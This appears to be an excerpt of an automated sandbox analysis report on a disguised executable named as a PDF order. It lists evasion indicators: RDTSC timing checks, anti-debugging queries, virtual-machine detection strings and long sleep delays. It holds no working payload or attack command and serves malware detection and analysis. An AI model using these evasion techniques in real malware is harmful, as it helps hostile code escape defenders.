          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508, type: MEMORYSTR
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 799904 second address: 79990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 799B6E second address: 799B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 7C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeMemory allocated: 9DB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00409AA0 rdtsc 4_2_00409AA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6070Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3687Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2779Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7164Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9327Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13821
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.0 %
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe TID: 2924Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2232Thread sleep count: 2779 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2232Thread sleep time: -5558000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2232Thread sleep count: 7164 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2232Thread sleep time: -14328000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532Thread sleep count: 129 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532Thread sleep time: -258000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532Thread sleep count: 9327 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6532Thread sleep time: -18654000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2121785718.00000000010C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n
          Source: explorer.exe, 00000006.00000002.4545985269.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000000.2113534114.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.2104403018.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2121785718.00000000010C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000006.00000000.2113534114.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000000.2105787269.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
          Source: explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000006.00000000.2104403018.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000000.2113534114.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2109047338.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00409AA0 rdtsc 4_2_00409AA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0040ACE0 LdrLoadDll,4_2_0040ACE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A025B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,8_2_00A025B2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EA118 mov ecx, dword ptr fs:[00000030h]4_2_011EA118
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EA118 mov eax, dword ptr fs:[00000030h]4_2_011EA118
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EA118 mov eax, dword ptr fs:[00000030h]4_2_011EA118
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EA118 mov eax, dword ptr fs:[00000030h]4_2_011EA118
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov eax, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EE10E mov ecx, dword ptr fs:[00000030h]4_2_011EE10E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01170124 mov eax, dword ptr fs:[00000030h]4_2_01170124
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01200115 mov eax, dword ptr fs:[00000030h]4_2_01200115
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146154 mov eax, dword ptr fs:[00000030h]4_2_01146154
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01146154 mov eax, dword ptr fs:[00000030h]4_2_01146154
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113C156 mov eax, dword ptr fs:[00000030h]4_2_0113C156
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D8158 mov eax, dword ptr fs:[00000030h]4_2_011D8158
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]4_2_011D4144
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]4_2_011D4144
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D4144 mov ecx, dword ptr fs:[00000030h]4_2_011D4144
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]4_2_011D4144
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D4144 mov eax, dword ptr fs:[00000030h]4_2_011D4144
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]4_2_011C019F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]4_2_011C019F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]4_2_011C019F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C019F mov eax, dword ptr fs:[00000030h]4_2_011C019F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113A197 mov eax, dword ptr fs:[00000030h]4_2_0113A197
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113A197 mov eax, dword ptr fs:[00000030h]4_2_0113A197
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113A197 mov eax, dword ptr fs:[00000030h]4_2_0113A197
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FC188 mov eax, dword ptr fs:[00000030h]4_2_011FC188
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FC188 mov eax, dword ptr fs:[00000030h]4_2_011FC188
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01180185 mov eax, dword ptr fs:[00000030h]4_2_01180185
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E4180 mov eax, dword ptr fs:[00000030h]4_2_011E4180
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E4180 mov eax, dword ptr fs:[00000030h]4_2_011E4180
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012161E5 mov eax, dword ptr fs:[00000030h]4_2_012161E5
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]4_2_011BE1D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]4_2_011BE1D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE1D0 mov ecx, dword ptr fs:[00000030h]4_2_011BE1D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]4_2_011BE1D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BE1D0 mov eax, dword ptr fs:[00000030h]4_2_011BE1D0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012061C3 mov eax, dword ptr fs:[00000030h]4_2_012061C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012061C3 mov eax, dword ptr fs:[00000030h]4_2_012061C3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011701F8 mov eax, dword ptr fs:[00000030h]4_2_011701F8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]4_2_0115E016
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]4_2_0115E016
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]4_2_0115E016
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E016 mov eax, dword ptr fs:[00000030h]4_2_0115E016
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C4000 mov ecx, dword ptr fs:[00000030h]4_2_011C4000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E2000 mov eax, dword ptr fs:[00000030h]4_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D6030 mov eax, dword ptr fs:[00000030h]4_2_011D6030
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113A020 mov eax, dword ptr fs:[00000030h]4_2_0113A020
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113C020 mov eax, dword ptr fs:[00000030h]4_2_0113C020
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01142050 mov eax, dword ptr fs:[00000030h]4_2_01142050
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C6050 mov eax, dword ptr fs:[00000030h]4_2_011C6050
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116C073 mov eax, dword ptr fs:[00000030h]4_2_0116C073
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012060B8 mov eax, dword ptr fs:[00000030h]4_2_012060B8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012060B8 mov ecx, dword ptr fs:[00000030h]4_2_012060B8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114208A mov eax, dword ptr fs:[00000030h]4_2_0114208A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D80A8 mov eax, dword ptr fs:[00000030h]4_2_011D80A8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C20DE mov eax, dword ptr fs:[00000030h]4_2_011C20DE
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113C0F0 mov eax, dword ptr fs:[00000030h]4_2_0113C0F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011820F0 mov ecx, dword ptr fs:[00000030h]4_2_011820F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0113A0E3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C60E0 mov eax, dword ptr fs:[00000030h]4_2_011C60E0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011480E9 mov eax, dword ptr fs:[00000030h]4_2_011480E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113C310 mov ecx, dword ptr fs:[00000030h]4_2_0113C310
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01160310 mov ecx, dword ptr fs:[00000030h]4_2_01160310
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A30B mov eax, dword ptr fs:[00000030h]4_2_0117A30B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A30B mov eax, dword ptr fs:[00000030h]4_2_0117A30B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117A30B mov eax, dword ptr fs:[00000030h]4_2_0117A30B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]4_2_011C035C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]4_2_011C035C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]4_2_011C035C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C035C mov ecx, dword ptr fs:[00000030h]4_2_011C035C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]4_2_011C035C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C035C mov eax, dword ptr fs:[00000030h]4_2_011C035C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E8350 mov ecx, dword ptr fs:[00000030h]4_2_011E8350
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C2349 mov eax, dword ptr fs:[00000030h]4_2_011C2349
